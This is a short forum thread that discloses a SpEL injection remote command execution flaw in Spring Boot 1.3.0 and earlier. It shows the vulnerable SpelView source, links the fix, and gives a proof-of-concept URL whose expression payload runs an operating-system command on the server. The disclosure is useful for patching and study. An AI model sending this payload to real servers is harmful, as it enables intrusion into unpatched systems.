HackerTop - View topic - Spring boot SPEL injection Remote Command Execution
View unanswered posts | View active topics It is currently Wed Dec 19, 2018 9:58 am



Reply to topic  [ 2 posts ] 
 Spring boot SPEL injection Remote Command Execution 
Author Message
User avatar

Joined: Sun Jul 24, 2016 12:11 pm
Posts: 10
Reply with quote
Impact version

Boot <=1.3.0 Spring.

An unaffected version

Boot >=1.3.1 Spring.

reference: https://github.com/spring-projects/spring-boot/issues/4763

Boot1.3.0 spring source file SpelView in the ErrorMvcAutoConfiguration.java class:

Code:

private static class SpelView implements View {

      private final String template;

      private final StandardEvaluationContext context = new StandardEvaluationContext();

      private PropertyPlaceholderHelper helper;

      private PlaceholderResolver resolver;

      public SpelView(String template) {
         this.template = template;
         this.context.addPropertyAccessor(new MapAccessor());
         this.helper = new PropertyPlaceholderHelper("${", "}");
         this.resolver = new SpelPlaceholderResolver(this.context);
      }

      @Override
      public String getContentType() {
         return "text/html";
      }

      @Override
      public void render(Map<String, ?> model, HttpServletRequest request,
            HttpServletResponse response) throws Exception {
         if (response.getContentType() == null) {
            response.setContentType(getContentType());
         }
         Map<String, Object> map = new HashMap<String, Object>(model);
         map.put("path", request.getContextPath());
         this.context.setRootObject(map);
         String result = this.helper.replacePlaceholders(this.template, this.resolver);
         response.getWriter().append(result);
      }

   }


poc

Code:
http://localhost/xxx?id=${@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ipconfig').getInputStream())}



Patch Diff https://github.com/spring-projects/spring-boot/commit/edb16a13ee33e62b046730a47843cb5dc92054e6


Sun Jul 24, 2016 12:41 pm
Profile

Joined: Tue Aug 09, 2016 8:53 am
Posts: 1
Reply with quote
follow lyon come here
:)


Tue Aug 09, 2016 8:55 am
Profile
Display posts from previous:  Sort by  
Reply to topic   [ 2 posts ] 

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
Copyright © 2003-2016 HackerTop. All rights reserved.
Privacy & Cookies Policy
Community Forum Software by phpBB